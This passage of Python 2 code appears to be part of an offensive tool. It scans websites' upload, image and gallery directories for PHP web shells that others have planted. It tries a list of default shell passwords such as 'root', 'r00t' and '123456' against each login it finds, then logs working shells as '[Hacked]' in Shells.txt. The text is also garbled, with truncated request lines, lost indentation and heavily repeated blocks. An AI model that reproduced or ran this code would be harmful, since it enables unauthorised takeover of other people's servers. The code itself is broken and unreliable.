if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
img_check = requests.get(SH7_O,timeout=15).content
if 'Index of' in img_check and '.php' in img_check :
shells = []
if re.findall(pattern_php,img_check):
shells = re.findall(pattern_php,img_check)
for shell in shells:
sh_check = requests.get(SH7_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
upload_check = requests.get(SH8_O,timeout=15).content
if 'Index of' in upload_check and '.php' in upload_check :
shells = []
if re.findall(pattern_php,upload_check):
shells = re.findall(pattern_php,upload_check)
for shell in shells:
sh_check = requests.get(SH8_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
gallery_check = requests.get(SH9_O,timeout=15).content
if 'Index of' in gallery_check and '.php' in gallery_check :
shells = []
if re.findall(pattern_php,gallery_check):
shells = re.findall(pattern_php,gallery_check)
for shell in shells:
sh_check = requests.get(SH9_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
files_check = requests.get(SH10_O,timeout=15).content
